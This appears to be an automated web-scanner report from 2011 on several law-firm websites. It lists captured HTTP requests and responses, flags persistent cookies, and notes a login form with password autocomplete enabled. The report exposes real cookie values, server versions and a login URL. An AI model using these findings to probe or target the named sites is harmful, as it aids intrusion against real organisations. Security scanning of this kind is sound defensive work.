GET /downloads HTTP/1.1 Host: www.fulbright.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:49:58 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A49%3A58%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D752%23cftoken%3D35971701%23cfid%3D24113095%23;domain=.fulbright.com;expires=Fri, 11-Jan-2041 15:49:58 GMT;path=/ Content-Type: text/html; charset=UTF-8
<html> <head> <title>
The International Law Firm of Fulbright & Jaworski
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /dubai HTTP/1.1 Host: www.fulbright.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:54:04 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A54%3A04%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D2016%23cftoken%3D35971701%23cfid%3D24113095%23;domain=.fulbright.com;expires=Fri, 11-Jan-2041 15:54:04 GMT;path=/ Content-Type: text/html; charset=UTF-8
<html> <head> <title>
The International Law Firm of Fulbright & Jaworski
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /favicon.ico HTTP/1.1 Host: www.fulbright.com Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CFID=24113095; CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A48%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D3%23cftoken%3D35971701%23cfid%3D24113095%23
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:08:56 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;domain=.fulbright.com;expires=Fri, 11-Jan-2041 15:08:56 GMT;path=/ Content-Type: text/html; charset=UTF-8
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /houston HTTP/1.1 Host: www.fulbright.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:54:25 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A54%3A25%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D2094%23cftoken%3D35971701%23cfid%3D24113095%23;domain=.16.1.67;expires=Fri, 11-Jan-2041 15:54:25 GMT;path=/ Content-Type: text/html; charset=UTF-8
<html> <head> <title>
The International Law Firm of Fulbright & Jaworski
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /industries HTTP/1.1 Host: www.fulbright.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:50:42 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A50%3A42%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D995%23cftoken%3D35971701%23cfid%3D24113095%23;domain=.fulbright.com;expires=Fri, 11-Jan-2041 15:50:42 GMT;path=/ Content-Type: text/html; charset=UTF-8
<html> <head> <title>
The International Law Firm of Fulbright & Jaworski
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /insite HTTP/1.1 Host: www.fulbright.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:48:52 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A48%3A52%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D157%23cftoken%3D35971701%23cfid%3D24113095%23;domain=.fulbright.com;expires=Fri, 11-Jan-2041 15:48:52 GMT;path=/ Content-Type: text/html; charset=UTF-8
<html> <head> <title>
The International Law Firm of Fulbright & Jaworski
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /international HTTP/1.1 Host: www.fulbright.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:52:43 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A52%3A43%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D1606%23cftoken%3D35971701%23cfid%3D24113095%23;domain=.fulbright.com;expires=Fri, 11-Jan-2041 15:52:43 GMT;path=/ Content-Type: text/html; charset=UTF-8
<html> <head> <title>
The International Law Firm of Fulbright & Jaworski
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /jblount HTTP/1.1 Host: www.fulbright.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:52:19 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A52%3A19%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D1481%23cftoken%3D35971701%23cfid%3D24113095%23;domain=.fulbright.com;expires=Fri, 11-Jan-2041 15:52:19 GMT;path=/ Content-Type: text/html; charset=UTF-8
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /languages HTTP/1.1 Host: www.fulbright.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:51:50 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A51%3A50%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D1351%23cftoken%3D35971701%23cfid%3D24113095%23;domain=.16.1.67;expires=Fri, 11-Jan-2041 15:51:50 GMT;path=/ Content-Type: text/html; charset=UTF-8
<html> <head> <title>
The International Law Firm of Fulbright & Jaworski
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /news/act_ticker_xml.cfm HTTP/1.1 Host: www.fulbright.com Proxy-Connection: keep-alive Referer: http://www.fulbright.com/fjLib/media/flash/news/newsTicker.swf Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CFID=24113095; CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D2%23cftoken%3D35971701%23cfid%3D24113095%23
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:08:48 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A48%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D3%23cftoken%3D35971701%23cfid%3D24113095%23;domain=.fulbright.com;expires=Fri, 11-Jan-2041 15:08:48 GMT;path=/ Content-Type: text/xml
<images>
<item> <news>Fulbright Partner Named Best FCPA Lawyer Outside of D.C.</news> <url>http://www.fulbright.com/index.cfm?fuseaction=news.detail&article_id=9405&site_id=286< ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /newsTicker.swf HTTP/1.1 Host: www.fulbright.com Proxy-Connection: keep-alive Referer: http://www.fulbright.com/dc Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CFID=24113095; CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:08:46 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D2%23cftoken%3D35971701%23cfid%3D24113095%23;domain=.fulbright.com;expires=Fri, 11-Jan-2041 15:08:46 GMT;path=/ Content-Type: text/html; charset=UTF-8
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /newyork HTTP/1.1 Host: www.fulbright.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:55:29 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A55%3A29%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D2404%23cftoken%3D35971701%23cfid%3D24113095%23;domain=.16.1.67;expires=Fri, 11-Jan-2041 15:55:29 GMT;path=/ Content-Type: text/html; charset=UTF-8
<html> <head> <title>
The International Law Firm of Fulbright & Jaworski
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /offices HTTP/1.1 Host: www.fulbright.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:51:14 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A51%3A14%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D1160%23cftoken%3D35971701%23cfid%3D24113095%23;domain=.fulbright.com;expires=Fri, 11-Jan-2041 15:51:14 GMT;path=/ Content-Type: text/html; charset=UTF-8
<html> <head> <title>
The International Law Firm of Fulbright & Jaworski
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /rss HTTP/1.1 Host: www.fulbright.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:52:42 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A52%3A42%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D1602%23cftoken%3D35971701%23cfid%3D24113095%23;domain=.fulbright.com;expires=Fri, 11-Jan-2041 15:52:42 GMT;path=/ Content-Type: text/html; charset=UTF-8
<html> <head> <title>
The International Law Firm of Fulbright & Jaworski
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /seminars/act_eventbanner_xml.cfm HTTP/1.1 Host: www.fulbright.com Proxy-Connection: keep-alive Referer: http://www.fulbright.com/fjLib/media/flash/events/eventsBanner_03.swf Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CFID=24113095; CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D2%23cftoken%3D35971701%23cfid%3D24113095%23
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:08:48 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A48%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D3%23cftoken%3D35971701%23cfid%3D24113095%23;domain=.fulbright.com;expires=Fri, 11-Jan-2041 15:08:48 GMT;path=/ Content-Type: text/xml
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /technology HTTP/1.1 Host: www.fulbright.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:49:17 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A49%3A17%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D393%23cftoken%3D35971701%23cfid%3D24113095%23;domain=.fulbright.com;expires=Fri, 11-Jan-2041 15:49:17 GMT;path=/ Content-Type: text/html; charset=UTF-8
<html> <head> <title>
The International Law Firm of Fulbright & Jaworski
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1 Host: www.jonesdaydiversity.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /2011insights.cfm?contentID=52 HTTP/1.1 Host: www.skadden.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=34916643.1295449749.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); BACKLINK=; __utma=34916643.540692983.1295449749.1295449749.1295449749.1; __utmc=34916643; __utmb=34916643;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:14:39 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: BACKLINK=%2CcontentID%3D52;expires=Fri, 11-Jan-2041 15:14:39 GMT;path=/ Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//E ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /alumni/Index.cfm?contentID=7 HTTP/1.1 Host: www.skadden.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=34916643.1295449749.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); BACKLINK=; __utma=34916643.540692983.1295449749.1295449749.1295449749.1; __utmc=34916643; __utmb=34916643;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:14:39 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: ALSITETOKEN=;expires=Tue, 19-Jan-2010 15:14:39 GMT;path=/ Set-Cookie: ALUSERTOKEN=;expires=Tue, 19-Jan-2010 15:14:39 GMT;path=/ Set-Cookie: BACKLINK=%2CcontentID%3D7;expires=Fri, 11-Jan-2041 15:14:39 GMT;path=/ Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//Dtd Xhtml 1.0 Strict//EN" "http://w ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /index.cfm?contentID=42&itemID=1478 HTTP/1.1 Host: www.skadden.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=34916643.1295449749.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); BACKLINK=; __utma=34916643.540692983.1295449749.1295449749.1295449749.1; __utmc=34916643; __utmb=34916643;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:14:39 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: BACKLINK=%2CcontentID%3D42%26itemID%3D1478;expires=Fri, 11-Jan-2041 15:14:39 GMT;path=/ Content-Type: text/html; charset=UTF-8
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1 Host: www.weil.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Most browsers have a facility to remember user credentials that are entered into HTML forms. This function can be configured by the user and also by applications which employ user credentials. If the function is enabled, then credentials entered by the user are stored on their local computer and retrieved by the browser on future visits to the same application.
The stored credentials can be captured by an attacker who gains access to the computer, either locally or through some remote compromise. Further, methods have existed whereby a malicious web site can retrieve the stored credentials for other applications, by exploiting browser vulnerabilities or through application-level cross-domain attacks.
Issue remediation
To prevent browsers from storing credentials entered into HTML forms, you should include the attribute autocomplete="off" within the FORM tag (to protect all form fields) or within the relevant INPUT tags (to protect specific individual fields).
The page contains a form with the following action URL:
http://www.political.cov.com/login.cfm
The form contains the following password field with autocomplete enabled:
password
Request
GET / HTTP/1.1 Host: www.political.cov.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
